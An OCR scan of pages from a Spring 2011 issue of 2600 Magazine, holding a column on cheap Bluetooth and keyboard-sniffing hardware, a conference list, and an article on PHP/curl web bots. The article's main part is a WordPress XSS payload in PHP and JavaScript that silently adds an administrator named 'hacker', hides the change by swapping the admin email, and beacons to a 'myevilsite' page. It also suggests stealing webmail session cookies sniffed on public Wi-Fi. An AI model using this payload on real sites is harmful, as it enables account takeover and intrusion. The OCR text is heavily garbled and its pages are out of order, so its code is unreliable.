time <content edited>. So he <content If
comparing 6 computer to a library still sounds weird
10 you, think oCthe librarian as the adminiJi-
lrator and the books as the content on the websites.
You go to the library (logging on to a computer and
going online) and find parts of books bave been
edited out (the websires that IuJve been ediled by
the new "quilting" filter software) by the librari.arui
(the adminillll'alor wbo is deciding what to block). I
find this fi ltering method won;e thanones thai block
websilCS completely because they could be used 10
alter the meaning of a text. It's unfortunale thai the
Page 50 ----------
Transmissions
In Drauorn . ,..
Here's a change of pace. I'm actually feeling more 10be forthcoming now thaI we have cheap
optimistic about some things in our field. There's tools.
some amazingnew opporumities for research into Too many protocols count on obscurity, rarity
protocols which were completely opaque to mosl of hardware, or simple legislative protection to
of us without corporate budgets, and more eyes on hide poor design. Why doesn't your Yaesu radio
something can only be: good. scanner tune to certain frequencies? Because it
Sniffing WiFi is easy. Sniffing WLFi has was easier to ban the sale of devices capable of
been, for the most part, always really easy to do. intercepting analog cell phone frequencies than it
Since the beginning of the last decade, $85 and a was l() fix the protocols to be more secure in the
PCMClA slot would get you a cheap Prisml or firsl place. Besides. DO one would ever break the
Orinoco card, another S80 or S100would get you law when they want to clone a cell phone, right?
3 GPS and a serial cable, and you were good 10 The key factor in being able to work on
go. Now you can go on Amazon and gel a card digging into a new protocol is being able 10
an order of magnitude more capable and sensitive communicate with other devices via that protocol.
for $40. Gel yourself three and cover the whole For network protocols, this is simple: capturing
spectrum. and creating network traffic. For other protocols,
WiFi bas a 101 of vulnerabilities, There are such as those used by smarteards or other inter-
any number of well-known attacks against it, and chip communications, some type of interface
every few months someone comes out with a new must be built, For wireless protocols, some ability
clever way to break Wifi. By comparison, Blue- to interface a radio of the appropriate type and
tooth is relatively unheard of in the vulnerability protocol is needed. Bluetooth is relatively harder
world. There aren't maoy attacks for iL You can to sniff than WLFi or ZigB.x, because instead of
scan for devices set in discovery mode, but in the using a contiguous range for each channel (WLFi,
last five or six years, masI default to hidden, aod for example, lL!lCS 22MHz per channel), it uses a
even though almost every device out there says frequency-bopping method. When a Bluetooth
"Use !hI;PIN0000 or 1234," you don't hear about device pairs, it establishes a random pattern which
any significant hijacking of Bluetoothdevices. divides ihe spectrum up into 80 IMHz slices,
What's the big difference? ls Bluetooth actu- and rapidly moves between them. In general, this
ally much more secure than WLFi? NOI really - allows more Bluetooih nerworks to exist in the
but you can't sniff Bluetoorh for $50. You can't same space, since each network uses a tiny slice
sniff Bluetooth for $200. The barrier for entry of the bandwidth for a tiny fraction of the time.
to sniffing Bluetooth has typically been either a The chances of two devices colliding arc much
multi-thousand dollar commercial development less than the wider. overlapping WiFi channels.
system which can analyze the device you're In practice, unfortunately, this makes Bluerooth
producing, or more recently the still thousand miserable to hack on. The channel changing and
dollar or more USRP2 doing software decoding. configuration is handled by the low-level hard-
The high cost barrier of entry to play with ware, which we can't easy get access 10.
low-level Bluctooth has kept a lot of backers from The solution, of course, is to do some hard-
being able to poke at the protocol. With fewer ware hacking of our own.
eyes on it, there has been much less significaci When people thiok about hardware hacking
research done on it, especially compared to WiFi now, they probably immediately think of the
or even the relatively newer and less well-known Arduino - justifiably so. The Arduino has prob-
802.15.4 ZigBee protocols. ably done more to popularize hardware hacking
TIlls has finally been changing with the work than anything else in recent years, and the quantity
done by Mike Ossman to introduce a low-cost of community development behind the Atduino is
home-brew radio device capable of sniffing admirable. The Arduino isn't the only chip in the
Bluetooth, bringing packet capture and injection game, though. It's an aniface of a greater drop in
on Bluetooth into the same price range as WiFi. the cost of high-tech manufacturing and general
Mike has already found a lot of inrerestingattacks tech availability. For perhaps the first time, the
against Bluetooth (check out some of his talks cost of developing high quality, power-efficient,
from Sbmoocon and Toorcon). and I'd expect and small devices is well within the r.lngeofindc-
Page 52 2600 Magazine
pendent hackers, researchers, and enthusiasts.
The next level of hardware hacking - spinning
your own boards • has already become afford-
able. Ossman is proving this via Kickstarter
(ht t p://www .kickstarter .com/proj
_ e c ts/mossmann/ubertoot h- one-an-
_ o p e n- sour ce-blu et o oth-te st-
- t ool/ - currently sold out and closing within
24 hours of this writing, but check for more in the
future), using "crowd sourced" (much as I hate
Ihal term) funding to build a fairly significant
quantity of radio boards capable of interfacing
with Bluctooth - $15 gets Ihe PCB, and $100 gets
a fully populated, assembled, and tested unit,
Cheap supply chains for custom hardware
means we ~ now gel past the barrier to Blue-
toothhacking and starting working with it directly,
nearly the same as with WLFi. Even without
community funding, making small quantities of
custom boards should be within the budgets of
many hackers, and definitely affordable if you
finda few friends to work on the project with you,
Manyconferences arc using embedded micro-
controllers in their badges as well - The Next
HOPE used the TJ MSP430 rnicrocontroller and
the Nordic RF 2Aghz radio chip - coincidentally
the same radio chip used in the Nike iPhone exer-
cise device, and Microsoft wireless keyboards.
Yup, that's right, Solder some USB headers
onto your 1NH badge, fire up tbe code Travis
ported from another open source radio project,
KeyKeriki, and sniff wireless keyboards real-time
(http://travisgoodspeed.blogspot
-. com/2011/02/promiscuity- is-
-nl:f241 01 s-du t y. htrnl) - another protocol
showing sigmficamly interesting possibilities
which was inaccessible due to lack of affordable
tools, and another reason to attend cons!
The first step. obviously, is in designing the
board. There are probably as many circuit board
layout tools as there arc word processors. WIth
about as much difference in price. On the free side
of things, Eagle is very popular and has 3 fairly
complete set of parts preconfigured in the system,
bUI comes with usage restrictions and doesn't
provide source code. Fortunately, there are plenty
of completely open source tools which provide
similar capability, but typically you'll spend more
time laying out CUSl()m parts and footprints,
Even circuit design "training" is affordable
now - as affordable as free, thanks 10 online tuto-
rials from SparkFun (and general tutorials on
You'Iubeat large), Thanks to the increase in home-
brew electronics, companies selling parts and
components have a business interest in providing
good, free tools and tutorials 10 encourage more
development.
Just about tbe only part of making complex
home-brew hardware that can'l (realistically) be
= Spring 2011
tackled at home is the PCB manufacturing itself;
Simple boards can be etcbed at home, but multi-
layer and surface-mourn scale boards are prob-
ably not reasonable to tackle singlc-handedly.
Even PCBprinling is surprisingly affordable now.
though, with the usual tradeoff of time VLTSUS
money.
Most PCBmanufacturing plants arc only inter-
ested in larger runs of boards. Of the ones willing
to do smaller batches, you're still comrnined to a
full panel, roughly 18 by 24 inches. For making
a number of devices, or when lime is a critical
factor, a full panel is a fantastic option, Using
Gold Phoenix (http:/ /www.goldphoenix
.pcb. bi z/), a Chinese manufacturer. you can
gel a full panel of boards, precut. and delivered in
about eight days for $120. A hundred and twenty
dollars!
For smaller runs of boards, or boards which
don't need more thantwo layers, there arc several
groups who will collate a number of smaller
designs into one large panel, and then have that
panel manufactured, then segment the orders,
and ship them back 10 the original customers.
You only pay for the amount of boards you
need, bUI you also pay for the lime needed for
someone to lay them out and panelize them,
the additional shipping costs, and you need Co
wait until enough people have submitted orders
to make up a full panel. Still, when YOU'fc on
a light budget or 001 sure if your design will
work and you need a handful of quality boards,
u's a fantastic option. One site, BatchPCB
(http:/ /bat chpcb.com/), runs a store
where you can sell your design and buy the
designs others have made public - Cafe Press for
circuit boards!
The only thing that isn't easily automated for
custom hardware is the placement of components
and soldering. There arc small-batch pick-and-
place automated facilities, but the cost is often 100
high. Fortunately, with the tutorial videos online
and the classes run at hacker spaces and confer-
ences, the skills needed to do eve" surface-mounI
soldering are fairly easy 10 pick up... and if you're
really good at it, you can probably fund your
project by selling completed boards at a markup
to compensate for your time.
We've finally crossed the threshold where
cheap hardware is going to lei us do a lot more
work with protocols which were closed to us
before; Bluetooth, keyboards, smartcards, RFID,
even bardware USB sniffing and complex tools
like logic analyzers are available for under a
hundred dollars, and often with complete specs
and board layout files so you can make them on
your owo if you don't want 10 buy the assembled
version. Grab some of the new hardware and gel
hacking.
PageS]
II
r
1\'
II
"
"
II,
'I
"
byMkab Lee
I'm going to explain how lO write code thaI
automatically loads web pages, submits forms, and
does sinister stuff, while looking like it's human.
These techniques can be usedto exploit cross-sire
scripting (XSSj vulnerabilities, download copies
of web-based databases, cheat in web games, and
quite a bit more. The languages ('m going to be
using are PHPaod JavaScripc. I'm primarily going
10 use WordPress as an example website that l'1I
be anscking, bUI that's only because I'm a fan
of WordPress. This staff will work against any
website, as long as you can find an XSS bole.
Tbe HTTP Protocol
Before J dive 100 deeply into code, it's impor-
tant 10 know the basics of bow the web works. It
all runsover lhis protocol called HlTP, which is a
very simple way that web browsers can communi-
cate with web servers. The browser makesrequests,
and the server returns some son of output based on
IhaLEacb time a browser makes an HlTP request,
il includes a lor of header information, and each
lime the web server responds, il includes header
information as well . Sometimes websites use
HITPS, which is just HTTP wrapped in a layer of
SSLencryption, so it uses the exact same protocol.
SQ, here's an example. I just opened up my
web browser, typed2600 . com in the address bar,
and hil enter. Here's the GETrequest I sent 10 the
server.
GET I HTTP/1.1
Host: 26uO .com
User-Agent : Mozilla/5 .0
- (Macintosh; v; Intel Mac
-OS X 10.6; en-US; rv:l.9.2 .3l
-Cecko/20l00401 fire f ox/3.6.3
Accept: text/hcml,applicationl
- xhtml .. xml i appl i ce t i on z
- xm1;q=0. 9, '1*;q=O .8
en-u5,en;q=0.5
Ac cept -Encoding: gzip,deflate
rSO-8 859-1,

Keep-Alive: 115
Connection: keep-alive
My web browser was smart enough 10 figure
out the [P address of 2600 . com and open up a
connection lO it on port 80. The first line is telling
the web server' want everything in the root direc-
tory (I) of the web server. The next line is telling il
thaI the host I'm looking for is 2600 . cam (some-
limes the same web server bosls several different
websites, so the Host header leIS the web :l<TVer
Icnow which one you're interested in). The chird
lioe is my user agent string, IlOd this rells thll web
server some information aboul myself. from !.his
Page 54
one you can teU thai I'm using Firefox 3.6.3 and
I'm using Mac OS X 10.6. The rest of the lines
aren't all thai important, but you can feel free to
look them up.
A IJOle about the user agent: It normally tells
the web server whai operating system and web
browser you're using. and web servers use this
information for a bunch ofdifferent things. Google
Analytics uses this to give website owners staIS
about what computers their visitors use. A 101 of
websites check ro see if the user agent says you're
using an iPhone and an Android phone and then
serves up a mobile version of the website instead
of the normal one . And then there are bots. When
google spiders a website to add pages to its search
engine database, it uses the HlTP protocol just like
you and me. but its user agent string looks some-
thing like th.is instead:
Googlehotl2 .1 (thttp://www.
-goog ". c om/bot. html J
h's ridiculously easy to spoof your user agent.
Try downloading the User Agent Switcher Firefox
extension just to see how easy it is.
Atler sending that GETrequest for / Lo:2 600.
com, here's the response my browser gal:
HTTP/I .l 301 Moved Permanently
Date: Sat, 22 May
-23:02:49 GfT
Loca t ion: http://www.2600. c om/
Keep-Alive:
Connection : Keep -Alive
Trans fer-Encoding: c hunked
Conten t-Type: t e x t /hun1 ; charset=
-i60-8859-1
It returned with a 30I error code, whicb means
it has Moved Permanently, Other common codes
are 200, which means everything is OK., 404,
which means File NOI Found, and 500, which
means Internal Server Error. The rest of the
lines are HITP headers, but the important one is
the Location header, If my browser gets a loca-
tion header in <I response, that means it needs 10
redirect 10 there instead, (0 this case, loading
http://2600 . coml wants me to redirect lO
hetl-': / Iwww.2600.com/ . My browser faith-
fully complies:
GET I HTTPIl. 1
Host, www.260 0. com
User- .I\gent: Moz i lla/S.O
.. (Macintosh; U; Intel Mac
-OS X 10 .6; en-US; rvd.9.2.3)
-Cecko/20l00401 Firefox/3.6.3
;more headers ... J
I"m seoding another GETrequest lO the server,
but this lime with the host as www.2600.com.
and it responds:
HTTP/I.! 200 OK
Imor0 headers .. . J
2600 Magazine
<html>
<he a d >
<t itle>2600: The Hacker
• Quarterly</title>
., :;cript type." textljavascript'
'-srC='nav . js'></script>
<link rel=' stylesheet' type:
.'text/css· hre(="nav.css' I>
<link rel="alternate'
title=
"'2600 . com RSS Feed' href:
... http://www.2600.com/rss.xml.>
lvovre H'TML .. . J
To recap, when we try 10 go to http://2600
•. com, it redirects to http://www.2600.com
(technically, these are separate domain names and
could behOICing separate sites) , Once il returned a
200 OK, it spit out !be HTMLcode of the website
hosted at I OJl www.2600. com. My browser
sends requests. the server sends responses. That's
called HlTP.
AQuick Note About Cookies
Cookies are name-value pairsthat websites use
10save information in your web browser. One of
their main uses is to keep persistent data about you
in an active "session" as you make several requests
10the server, When you login 10 a website, the OD1'1
way it knows thai you're still logged in the next
lime you reload the page is because you send your
cookie back lOthe website as a line in the headers.
You pass cookies to the web server with the
"Cookie:" besder, and the web server sets cookies
in your browser with the "Set-Cookie:" header,
This is important to understand because a 101
of bats you write might require you lO correctly
handle cookies 10 do what you want, especially if
you want to do something like exploit an XSS bug,
make a social networking worm, or write a scrip!
lhal downloads and stores everything from some-
one's web rnaiI account,
Some Tools to See WTF Is Going On
You rarely actually sec what H1TP headers
you're sending 10 web servers, and what headers
an: included in the responses. For writing this
ankle, I used the Firefox extensions Live H1TP
Headers and Tamper Data. Other Firefox exten-
sions thaI you might find useful are FireBug and
Web Develeper Toolbar (useful for cookie manage-
ment). Also, W"1Ieshart. and tcpdump an: great cools
for any sort of network monitoring. And if you're
trying this OD more complicated sites, especially
ODes with lots of Ajax, I highly suggest using an
intercepling proxy like Paros Of WebScarab.
Start with Something Simple
With PHP, the besl way lo write a web bol is 10
use the Curl functions. The Curl funCtiOllli 10loIow
arecurl)nit(), curl_seIopt(). curl_eJr.ec(), and curl_
clOS<:() . Here's an example of a simple PHP scripl
Spring 20ll
thaI checks 2600 '.s Twiner feed and prints out the
latest tweet. And, just for laughs , we'll pretend 10
be using rE6 00 Windows,
<?php
II get
-and store it in Soutput
sch curl_init.();
curl_se topt($ch,
- 'ht tp://twitter .com/2600');
curl _ setopt ( sch , CURLOPT.
-RE'I'URN'l'RANSFER, true);
curl _setopt(Sch, CURLOPT_
"'USERAGENT, 'Mozi lla/4.0
- ( compatible; MSIE 6.0;
-Windows NT 5 . 1 ) 'J ;
$output = curl _exec<Schl:
curl_close($ch);
II s e arch thr ough Soutput
- for t he lat e s t tweet
$sta r t_string : '<span
-claSS='entry - c ontent"> ';
Sstart = serpos(Soutput,
- Ss t a rt_string , 0 )
.. st r l e n (Sstart_ string);
Send . s t rpos t soucput • '</span>'
-, $start);
Stweet = substr($output,
$start, Send-Sstartl;
JI d i splay this tweet
co the screen
echo(trim($tweetl ,'\n");
?>
Go ahead and make a new PHP file and pul this
code in it, Run it either from a web browser (you
need lOcopy il 10 the web rool of a computer with
a web server installed) or the command line (type
php n1enarne. php as long as '1011 have PHP and
libcurl installed). Assuming Twitter hasn't changed
their layout sino: I wrote this, it should print out
2600 slatest tweet.
I'll go through it line by line. In the first block
of code. curl_initO gets called and stores a b..and1e
10 the Curl object in the variable Sch. The next
three lines of code add options lO this Curl object:
the URL of the website it will be loading, thaI
we want curl exec to return all the HTML code,
and we set ;; fake user agent string pretending
we're using IE6. The nat line of code runs eurl_
exect), which actually sends the HTrP request to
http://twitter.com/2600, and then stores
everything returned into $OutpUL And lben thenext
line, just to be good, closes the Curl object, Now
we have all the HTML fromthat request stored in
the variable Soutput, as one large string.
The next block of code sear<:bes through
the renamx! HTML code for the first tweet II
uses very common string handling functions:
strpos(j, strlenO, and substr(). Every program-
ming laoguage bas some of Ibis stuff buill in.
and if you're Bot familiar with these functions,
I encourage you to look them up. Basically, this
Page 55
,I,
.11,

II
,I
page, it containsthis:
<i nput t ype=" hi dden' i d=' _wp
"nonce" name="_wpnonc e " va l ue =
... ·07cd24 5b42· I >
Toget that value, we'll just needto senda GET
request to Iwordpress/wp·admin/user-new.php
first, search through its HTMLfor the hiddenfield
called "_wpnonce", and thensubmit the formwith
that value. Here's a PHPscript that does all of that:
--------------------Page57
Spring 2011
request needs to includethese fields: "_wpnonce",
" wp_hllpJeferer", "action", "user_login",''first_
"Iastjiame", "email", "uri", "passl ",
"pass2","role", and"adduser" (althoughseveralof
the valuesare blank).
The first field, _wpnonce, is going to cause a
problem. That's therespecifically toprevent people
like me from doing things like this. The value is
"07cd245b42", but howare we supposedto know
that? I f I look at the source code of the add user
<?php
II set t he urI o f the wordpress s ite t o do t his on
$wp_url - ' ht t p:// loca l hos t/wor dpress' ;
II this will only work if we already ha ve a us ername a nd pas sword
Sus e r name = ' admin ' ;
Spassword = 'supersecret ';
II set ehe username, password , and emai ' of the new user we wi ll crea t e
Snew_username - 'hacker' ;
sn ew-pas swor d = ' l e t me i n ' ;
$new_emai l = ' hac ke r @f a kc<?ma i laddr ess . com';
I I make up a user agent to us e, l e t s say iE6 again
Suse r _agent Icompat ible ; MSI E 6. 0; Wi ndows 5.1 ) ';
.' .1 scare by logging into wordpress (using POST, not GI:;'r l
Sch =
cUrl _s e t opt (scn, CURLOP':_URL, swp_url.' Iwp' in . php ' ) ;
cu rl_secopt($ch, CURLOPT_POST, true);
cu rl_setopt ($ch , CURLOPT_POSTFIELDS, 'log='. url encode ($us ername) .
-'&pwd=' . ur_encode(Spasswordl

cur l _setopt l $ch, CURLOPT_REfERER, $wp_url.' /wp-login.php ' ) ;
curl_set op t ISch , CURLOPT_RETURNTRANSFER, true);
cur l_se t opt($ch , CURLOPT_HEADER, true );
curl_setop t ($c h, CURLOPT_USERAGENT, Sus er_agen t);
$output = curl_exec ($chl ;
curl _close ($c h ) ;
II sea rch Sout put for the four cookies , add t hem to an a rray
Si ndex = 0;
Scooki eS t ri ngs = ar ray() ;
f or($i =O; $i<4; $i+ +l (
$s tar t _stri ng - 'Set-Cookie : ';
$s ta rt = strpos($ou tput , $s t a rt string, Sindex ) •
.. s t rlenl$star t_s tr i ng ) ;
Send_s t r i ng = ' ;';
send = str pos( Sout pu t, send_s tr ing, $s tart) ;
ScookieSt ri ngs [] = substr($output, $s t a rt , Send- $s t a rt);
Sindex = send + s trl e n (Se nd l ;
}
I I turn cookies into a single coo ki e s t r i ng (skipping 4th cooki e, since
- i t ' s t he s ame as 2nd )
Scook i e = Scooki eSt r i ngs [Oj .' ; '. $cookieStrings,11.';
- Scook ieStrings(3) :
II load t he add use r page
Sch = cur l _i ni t ( );
curl_setopt(sch , CURLOPT_URL, $wp_u rl .'/wp-admin/user-new.php');
cur l_s etopt( Sch, CURLOPT_REFERER, $wp_url . ' / wp- admi n/ ' ) ;
c url_se t opt (Sc h, CURLOPT_RETURNTRANSFER , true);
Cur l _se t op t ($c h, CURLOPT_USERAGENT, s us e r _age nt ) ;
curl_set opt( $ch, CURLOPT_COOKI E, Scookie) ;
Soutput = curl_exec($ch ) ;
curl_closel $ch) ;
II search f or _wpnon ce hidden field va lue
-'822683fe7f6; path= /wordpress/wp
--content / plugins; httponly
Set-Cooki e: wordpress_bbfa5b726c6

-'74755424%7C70045a572d5f43ad9dOf e
-'822683fe7E6; path=/wordpres s /wp
-'-adrnin; httponl y
Set-Cookie: wordpress_logged_in_
-'bbEa5b726c6b7a9cf 3cda93 70be3ee91
-' =admin%7C12747554 24%7C3 2f 9298d 93
-71bbc7f 684dafb2ce161bb;
-wordpress / ; httponl y
Location: http : / /l ocalhos t /word
-'press /wp- adminl
[some more headers here t oo . . . )
AIter loggingin, the websitesets fourcookies,
and each cookie has a path. As you can see, two
of the cookies have the same name and value, but
different paths. Don't worry about this, the web
browser will only send one copy of this cookie.
Now I'm going ahead and adding a new user
called"hacker" with the email address ha ck e r@
... fakeema iladdress . comand the password
"letmein". Here's the post request:
POST Iwor dpres s/wp- a drnin/ user - new
-. php HTTPIl.l
Host: localhost
User-Agent : Mozi l1a /5.0
- (Ma c i nt os h; U; Intel Mac OS X
... 10.6; en-US; r v :1.9 . 2.31
-Gecko/20100401 Firefox /3.6. 3
[mor e headers ... J
Referer: http :// localhost/word
-'press /wp-admin/user-new.php
Cookie: wordpress_bbfaSb726c6b7a9
-'cf3cda9370be3ee91=admin%7Cl
274758230%7C2fd245efd985716182bf 7
-6c2a5d44 693; wordpress_test_c oo
-'kie=WP.Cookie+check; wp-sett ing
-s-time-1=1274585390 ; wp- setting
-'s-1=m6%3Do; wordpress_logged_in
-_bbfa5b726c6b7a9cf3cda9370be3ee
-'91=admin%7C1274758230%7C037c4338
-'11bdOS0823aeS70f3b3d38dS
Content-Type: a pp l i c a t i on/ x- www-
-'form-urlencoded
Content-Length: 236
_wpnonc e=0 7cd245b42&_wp_http_refe
-'rer=%2Fwordpress%2Fwp-admin%2F
-'user-new.php&action=adduser&
-user_log i n =hacker&first_name=&
-'last_name=&email=hacker%40fake
-emailaddress .com&url=&pass1=let
-'mein&pass2=letmein&role=admin
... istrator&adduser=Add+User
In order to add a oew user, I need to send a
POST request to Iwordpress/wp-admin/user-oew.
php. I need to pass along a cookie string with the
cookiesthat wereset earlier. The data for the POST
2600 Magazine
searches Somput for the first occurrence of the
string <span dass="entry-conlent">, and then the
next <zspan>after that, and stores what's between
those in the variable Srweet, I figured this OUI by
going10 lWiner.com/2600 myself and viewingthe
sourceof the page.
And then the final echo() function just prints
out Stweet, The trimO functions strips the white
space, and thenI add a newline at the end to make
thedisplaya littleprettier. Prettycool, huh?
Automatically Creating WordPress Users
Now let's do something a little more diffi-
cult. Let's login to a WordPress website (for this
example, hosted at http://localhost/
"'wordpress I ) and add a new administrator
user. I 'll do this manually first and record the
HTTPconversation with the Live HITP Headers
extension.
POST I wor dp r es s/ wp- l ogi n . php
... HTTPIl.l
Host: localhost
User-Agent : Mo zilla /5. 0
... (Macint osh ; U; In tel Mac OS X
... 10 . 6; en- US; rv:I .9 .2.3)
Ge c k o/20100401 Firefox/3.6 .3
ext ra headers . . . J
Referer : ht t p: // l oc a l hos t/
-wordpress/wp-l og in .php
Cooki e : wordpres s_test_
-cooki e=WP+Cookie+check
Con t ent-Type: appl icationl
-x-www-Eorm-urlencoded
Content-Length : 116
log=admin&pwd=supersecret&wp-

-http%3A%2F%2flocalhost %2Fwordp
-ress%2Fwp-admin%2F&testcookie=1
This time I sent a POST request (the ones
above for 2600 .com and twitter .com were
GET requests), and this time I also sent a Referer
header, and a Cookie header. POST and GET
are similar, but GET requests send all the data
through the URL, while POST requests send the
data beneaththe headers in the POSTrequest. As
you can see, beneaththe POST request headers is
a lJRL-encoded string of name-value pairs. "log"
is set to "adrnin" (which is the username), "pwd"
is set to "supersecret" (whichis the password), and
then there are other hidden fields that get sent to:
"wp-submit" is "Log In", "redirect jo" is ''http://
localhost/wordpress/wp-admin/", and "testcookie"
is '""1",
Andhere was the response:
HTTP/I.l 302 Found
Set-Cookie: wordpres s _test_cookie
-=WP+Cookie+check;
-
Set-Cookie: wor dpress_bbfa5b7 26c6

-74755424%7C70045a572d5f43ad9d Ofe
Page 56----------
$s tart_string = ' <input type="hidden" name="_wpnonce·
.. value="' ;
$start = strpoS( $output, Sstart_string, 0) + s trlen($start_string);
Send-string = , . I>' ;
s end = strpos($output , send_string, Ss t a r t );
S_wpnonce = substr( $output, $start, $e nd -$s tar t l ;
I I add our new user
$ch = c ur l _ i ni t ( ) ;
curl_setopt($ch, CURLOPT_URL, $wp_url.' /wp-admin/user -new.php ') ;
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, '_wpnonce=' .urlencode($_wpnonce).
"'&_wp_ht·tp_referer=%2Fwordpress%2Fwp-admin%2Fuser -new.php&act ion=
"adduser&user_log in=' .urlencode($new_username) . ' &fir st_name=&last_name=
"&email=' .urlencode($new_email) . '&url =&passl=' .urlencode($new-passwordl
... '&pass2=' . ur l e ncode l$ new-pa s swor d ) . '&r o l e =a dmi n i s t r a t or &addus e r=
"AddTUser ') ;
curl_setopt ( $ch , CURLOPT_REFERER, $wp_ ur l . ' / wp- admi n/ us e r - ne w. php ' ) ;
cur l _ s e top t ($ch , CURLOPT_RETURNTRANSFER, true);
curl_setopt ($ch, CURLOPT_USERAGENT, Sus e r _a gen t) ;
c u r l _se t op t ($ch , CURLOPT_COOKIE, $cookie) ;
$o u t pu t = curl_exec( $ch) ;
curl_close ($ch ) ;
7>
)
II the us er page
var httpl = ajaxObject();
hctpl.open (" GET" ,wp_urlT"/wp-admin/user-new.php" ,true);
httpl.onreadys t a techange = function() (
if(httpl.readyState != 4)
return;
II search f or _wpnonce h idden field val ue
var start_string = ' <i npu t type= "hidden" i d . "_wpnonc e "
• name ="_wpnonc e" va l ue="' ;
var start = h ttpl . responseTexc.indexOf(start_s tring, 0) T
• s t art _ s tri ng . l ength ;
var end_string = , . I>' ;
va r end = httpl.responseText.indexOf(end_string, s t a r t ) ;
var _wpnonce = httpl.responseText.subs tring( star t ,end);
istrator of the site when a new user account gets
created, so really this won't be silent at all. To get
around this, you can have the script first load the
WordPress settings page to see what the admin
email address is set to, then post lhe form to change
the email address to your own email address, then
add a new user, then submit the settings form again
to change the email address back. 10 this way, the
real admin would never get an email about it, and
you would instead.
It might take a week for the admin to get around
to running your code, it might just take a day, or
they might never run it, If you want to be alerted
when it happens, you can use Ajax to do that too.
Make a page 00 a website you control (say, http://
myevilsitelalert.php) that sends you an email when
it gets loaded. Then make the Ajax GET that script
Pae« 59
II add out new user
var http2 = ajaxObject( );
http2.open(" POST" ,wp_url+"/wp-admin/user-new .php", true );
http2.setReque s tHeader("Content-type","appli c a tion/
" x-www-form- url encoded" ) ;

"%2Fwordpress%2Fwp-admi n%2Fuser- new . php&ac ti on=adduser&user_
"login= ' Tescapel new_username ) +'& fir st_ narne =& last_name =&e ma il='+

"Tescape (new-pas swor d ) T' &r ol e= administrato r&adduse r=AddTUser ') ;
• commen t e rs are a bunch of Whenever anyone loads this page, it executes
.. <s c r i p t s rcvh t cp . I I http://myevilsite!back.js on your site. Here's
.myevils ite/hack. j s s -e zacr i pt; » what' s in hack..js:
.. ........ ......... .... ..... ..... ......... .... ..... ..... ....... ...... ..... .... ...... ....... ..
II s e t up
va r wp_ur l = 'http : //localhost /wordpr e ss';
var new_usernarne = ' ha c ke r ' ;
var new-password = 'le tmein';
var new_email = .hacker@fakeemailaddre ss .com.;
II c reace an a j ax ob j ec t a nd return it
f u nc t i o n aj axOb j e c t () (
v ar ht tp;
i f (window. XMLHttp Re ques t ) ( http=new XMLHt tpReques t();
e lse( h t tp=new ActiveXOb j e ct ( "Mi crosoft . XMLHTTP") ; }
return h t tp;
I
ht tpl. s end () ;
If an admin loads this page, a new adminis-
trator user called "hacker" will silently get created.
Ifyou want to test this out on a WordPress site you
control , go ahead and upload this script as hack.js
somewhere, and include it in a post (by editing the
post in HTML mode). Make sure you delete the
"backer" user first if it's already there. Then, while
you're logged in, load the post page, and go check
to see what WordPress users your site has. There
will be a new one.
This particular script could be improved in a
COuple of ways. For example, you can check to see
if the user is logged into WordPress first before
trying to add a new user (there wiII be a lot more
traffic in the logs if each and every visitor sends
extra requests to wp-admin/user-add.php). Also,
by default WordPress sends an email to the admin-
_ .....-..:Spring 2011
Wbatis XSS?
An XSS bug is where you cansubmit informa-
tion that includes JavaScript code to a website that
gets displayed back to users of that website. So,
for example, maybe your First Name is "Bob", and
your Last Name "<script>alert(O)<lscript>" . If,
after you submit this form, it says your first name
is "Bob" and it pops upan alert box that says 0, that
means you've found an XSS bug. If someone else
goes to your profile page, it will pop up an alert box.
for them that says 0 too.
Popping up an alert box is harmless enough,
but with the power of Ajax, you can do a lot more
sinister stuff. Admins often have the ability to add
new users to websites. If an admin stumbles upon
your profile where the Last Name field actually
contains JavaScript, that code could silently add
yourself as an admin user on the site, and even
alert you that this has happened so you can login,
escalate privileges to command execution on their
server, and cover your tracks.
People use Ajax as a buzzword to mean any
sort of fancy JavaScript. Really, all Ajax is is
the ability for JavaScript to make its own HTIP
requests and retrieve the responses, similar to the
Curl library in PHP.
The WordPress XSS Payload
The PHP script that added a new user is a good
start, but it's not very useful for backing websites,
You need to already have access! With XSS, you
trick someone else who does have access to run it
for you. Pretend with me that there's an XSS bug
in the comment form in WordPress. You can post
a comment and include JavaScript code that will
then get executed wbenever anyone loads the page.
You post a cornmeot that says :
Good point! And all the other
2600 Magazine
Thoughts 00 PHP Dots
Using PHP and Curl, you can write a bot that
can do (almost) anything a human can do, as long
as you're able to do it by band first and see what
the H1TP headers look like. And since it's a bot,
it's simple to run it, say, 150,000 times in a row,
or to run it once every five minutes until you want
to stop it.
What if you want to be anonymous? It's easy
to use Curl through a proxy server, and in fact you
can even use Curl through the Tor network (though
it will be much slower) . Just look up the docs for
cur1_setopt() to find out how.
I mentioned writing bots that can download
and store all the email in a webmail account. Well,
webrnail uses HlTP, which means it uses cookies
to keep track of active sessions. It's totally feasible
to write a PHP script that, given a cookie string for
sorneone's Yahoo! mail account (which you can get
by sniffing traffic on a public Wi-Fi network), can
download and store all of their email as long they
don't log out before your script is done running.
These are all things you can do with PHP, or
with any other server-side language like Ruby,
Python, Perl, or C. But JavaScript on the other
hand runs in web browsers , and you can get other
people (like adrnins or other users of websites
you're trying to back) to run your code in their
browsers if you exploit an XSS bug.
Page 58
This little piece of code totally works (with
WordPress 2.9.2 anyway). Change the $wp_url,
$usemame, and $password to a WordPress site
you control, and run it. Go look at your WordPress
users. You'll have a new administrator user called
"hacker".
-------------------Page61
June 18-/9
TooeCoe Seattle
Last Supper Club
Seattle, WA
www.toorcon.org
August 4·7
DefCOD
The Rio Hotel and Casino
Las Vegas, NY
www.defcon.org
August 5-7
NlnjaCoo
The Hub Vienna
Vienna, Austria
20II.ninjacon.nel
August 10-14
Chaos Communlcatioo Camp
Finowfurt, Germany
events.ccc.de/category/camp-20 II
August 26·27
Jurackerf'es! 2011
Delemont , Switzerland
blogjurackerfest .ch
September 8-9
SEC-T
Stockholm, Sweden
www.sec-r.org
December 27-30
Chaos Communication Congress
Berliner Congress Center
Berlin, Germany
events.ccc.de/categoryJ28c3
Please send us your f eedback on any events you attend and
let us know if they should/should not be listed here.
April 7-9
Hackito Ergo Sum 2010
Paris, France
hackitoergosum.org
April )4·/7
Notacoo
Hilton Garden Inn
C1eveland,OH
www.notaoon.org
April 22·25
Easterbegg2011
Eidelstedter Mansion Association
Hamburg, Germany
wiki.hamburg.ccc.delindex.phplEasterliegg20II
June 2-3
AlbCoo
Jockey's Country Club in Kifisia
Athens, Greece
www.athcon.org
June 3-5
Freifunk Wireless Community Weekend 2011
c-base space station
Berlin, Germany
